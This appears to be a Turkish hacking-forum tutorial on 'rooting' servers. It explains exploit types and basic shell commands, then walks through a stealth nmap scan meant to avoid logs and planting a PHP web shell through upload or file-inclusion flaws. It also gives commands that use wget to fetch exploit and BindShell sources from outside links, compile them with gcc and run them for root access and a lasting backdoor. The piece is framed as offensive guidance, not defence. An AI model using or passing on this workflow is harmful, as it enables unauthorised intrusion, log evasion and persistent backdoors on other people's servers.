System Rooting

System Rooting

0×01 - Exploitler Hakkinda Bilgi
Exploitler yazılımlarda var olan açıkları kullanabilmeye yarayan yazılımlardır.Genelce
C/C++ ve Perl dilinde yazılırlar.Exploitler Local ve Remote olmak üzere iki gruba ayrılırlar.
Remote Exploit : Sistemde hiç bir yetkiye sahip olmadan uzaktan müdahale ile sisteme sızmak üzere k0dlanmışlardır.
Local Expoit : Sistemde var olan hesabınızı r00t seviyesine yükseltmek vs.amacı ile k0dlanmışlardır.Örneğin bir
her zaman Remote Exploit ile sisteme root olarak giremeyebilirsiniz işte bu durumda var olan hesabınızı Root seviyesine
çıkartmak içün bu exploitler kullanılır.

0×02 - Neden Shell ve Shell Komutları ?
Birincisi exploitler kaynak kod halinde gelirler bunların çalıştırılabilmesi için derlenmeleri yani makine diline
çevrilmeli bunun için Shell’de hali hazırda gelen “GCC” derleyicisini kullanıyoruz.Neden windows ortamında derleyemiyoruz ?
Bazı exploitler Windows’ta derlenebilirler yazılışları itibari ile fakat çoğu exploit library hatası vs. vermekte
Shell hesabını nerden bulabiliriz bunun en basit yolu bir Linux dağıtımına sahip olmak alternatif olarak ücretli bir shell
sahibi olabilirsiniz ne kadar mantıklı tartışılır Makinenize Linux yüklemeniz durumunda Shell’e bağlantı hakkında
bilgiye gerek yok sanırım Sahip olduğunuz bir Shell hesabınıza bağlantı için Putty program(cığ)’ını kullanabilirsiniz.
Putty bir telnet Client’idir.Putty programını açtığımızda sırasıyla “Hostname(IP)->Protocol(SSH/Telnet)->Port” kısımlarına
gerekenleri yazıp bağlanabilirsiniz.
Shell Komutlari ;
wget : sisteme dosya çekmeye yarar (Örn; https://tik.lat/VBfYI )
ls : bulunduğunuz dizindeki dosyaları listeler.
ls -a : Gizli dizin ve dosyaları bildirir.
ls -l : Bütün dosya ve dizinleri boyut ve tarihleriyle listeler.
rm : belirttiğiniz dosyayı ve dizini siler.
gcc : GCC Compiler’ı çalıştırır exploitimizi bu derleyici ile derleyeceğiz
whoami : Sistemde ki yetkinizi bildirir root yazarsa ne mutlu nobody yazarsa bile ii
./ : Belirtilen programı çalıştırır Örn; ./BindShell
pwd : bulunduğunuz dizini bildirir
who : Sunucuya bağlı olan kişileri bildirir
uname -r : Sistem kernel numarasını verir
uname -a : Kernek hakkında bilgi verir.
cat : belirtilen dosyanın içindekilerini ekrana basar
pico : belirtilen dosyayı text editör ile açar
ps -x : Sizin çalıştırdığınız uygulamaları gösterir
ps -a : Sunucuda çalışan tüm işlemleri gösterir (Bunlara göre exploit aranabilir mi ne dersiniz ;))
0×03 - Sistem Hakkında Bilgi Toplamak ve Exploit Temini
Genelde Netcraft adlı site kullanılıyor bu işlem için ama gördüğüm kadarıyla pek detaylı bir bilgi vermiyor.İşletim sistemi
ve Web Server hakkında bilgi veriyor.Oysa sistemde açık olan portlar üzerinde kullanılan daemon ve versiyonları vesaire
hakkında bilgi edinmeniz sisteme göre exploit bulmanıza ve sistemdeki diğer açık kapıları görmenize yardımcı olur.
En çok kullanılan Ağ Haritalama aracı NMAP’tır.NMAP hemen hemen tüm Linux dağıtımlarında default olarak gelmekte.NMAP’ın
DOS ve Windows versiyonu da mevcuttur.Shell ve Dos versiyonunda “nmap” yazdığınızda kullanılan parametreleri
görebilirsiniz.Çeşitli tarama tipleri var bunların çoğu Serverdaki loglarda görülürler.SYN Stealth tipi tarama büyük
ölçüde loglanmıyor.Bu tür bir arama yapmak için komut satırına “nmap -sS -T4 -F -A -O IP Numaranız” yazamanız yeterlidir.
Bu tarama ne işe yarayacak ? Bu tarama açık olan portları yaptığı işlemi üzerinde kurlu daemon’u vs listeler.Bu tip bir
işlemde sisteme saldırı yapmak için gerekli exploitleri bulmanıza yardımcı olacaktır.Örneğin Windows bir sistemin 445.
portunun açık olduğunu biliyorsunuz bu durumda bu port için kullanılacak bir exploit arayacaksınız mesela RPC Exploiti
DCOM ve sistemde admin oluyorsunuz.İşte bu kadar işimizi basitleştiriyor (fazla abartmamak lazım:)) Açık olan portlar için
https://tik.lat/njLod adresine bakabilirsiniz.Exploit bulma konusuna gelince bunun için bir sürü site var
bu konuya fazla değinmeye gerek yok…Spawn’ın yazmış olduğu dökümanda görmüştüm orada “Scan Project” isimli bir
tarayıcıdan bahsedilmişti 80. port’u tarıyor Apache modüllerini detaylı bir şekilde veriyormuş ben kullanmadım.
0×04 - Listpath Faideleri
Konu açılmışken buna da değinelim demi ama Listpathler php’de yazılmış scriptlerdir bu tip scriptler serverda komut
çalıştırmaya yarar.Bu dosyaların çalışabilmesi için Safe Mod OFF durumunda olmalı ki bu hakkaten tüm serverlarda böyle
bu konuda pek zorluk çıkmaz yani Upload,File inclusion veya host edinerek bu dosyaları servera yedirebilirsiniz.
En çok kullanılan PHPSHELL.php scripti bu script ile serverda komutlar işlersiniz.Örneğin ; serverın tmp dizinine gerçilir
daha sonra buraya wget www.site.com/bindshell komutu ile bindshell çekilir ./bindshell ile kurulur ve Putty ile bindshel’e
bağlanılır daha sonra o sistem r00tlanmaya çalışılır sonrasını ilerleyen yazılarda anlatıcaz işte
Note : Sisteme girdikten sonra sistem hakkında daha iyi bilgiler edinebilirsiniz Örn; uname -r komutu ile kernel versiyonu
öğrenilerek bu kernele göre exploit aranabilir.
0×05 - “GCC” ile Exploit Compiler ve Exploitin Çalıştırılması
Bulduğumuz exploit’i derlemek için sisteminize o exploiti çekmeniz gerekiyor.O exploiti sisteme çekmek için “Wget” komutu
kullanılıyor.Kullanımı basit
wget https://tik.lat/ANmAV
komuyu ile exploiti çekebilirsiniz veya o exploiti sisteminizde bir txt dosyasına kaydedersiniz sonra da uzantısı “.c”
olacak şekilde kaydedin daha sonra exploitin bulunduğu dizine gelin ve derleme işlemini gerçekleştirin.Tüm bunları
Shell’de gerçekleştiriyoruz.
Exploit derleme konusuna gelince aşağıdaki komutu konsol’a yazıyoruz.
gcc -o exploit exploit.c
komutu incelemek gerekirse “-o” parametresi dosyanın derlendikten sonraki ismini belirlemek için kullanılır, “exploit”
dosyanın derlendikten sonraki ismi, “exploit.c” ise exploit’in kaynak kod dosyasıdır.Her zaman aynı şekilde derlenmeyebilir
bu nedenle exploit’in kaynak dosyasını incelemk’te yarar var.
Daha sonra exploit’mizi aşağıdaki komutla çalıştırıyoruz.
./exploit IP ve gerekiyorsa Port şeklinde çalıştırılır.
Local Root Exploit’i ile çalışıyorsanız yine kaynak dosyasını inceleyin.Local Root exploitleri ./exploit şeklinde
çalıştırabilirsiniz.
0×06 - Sistemde Backdoor Açmak ve BindShell Kurulumu
BindShell nedir ? Bindshell sisteme sonradan tekrar bağlanabilmek için bir arka kapı açabilmemize yarayan bir yazılımdır.
Sistemde BindShell kurabildiğinize göre şu an sistemin içindesiniz.BindShell tıpkı exploit gibi derlenip çalıştırılıyor.
Kısaca açıklayalım.Exploitiniz derli ise sisteme çekip çalıştırmanız yeterli.
wget https://tik.lat/3tKDv
gcc -o BindShell BindShell.c
./BindShell
şeklinde BindShell’i sisteme kurduk daha sonra kurduğunuz BindShell’in mutlaka Port numarasını biliyor olmalısınız.
Putty ile sisteme bağlanıyorsunuz onuda yukarıda anlatmıştık.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.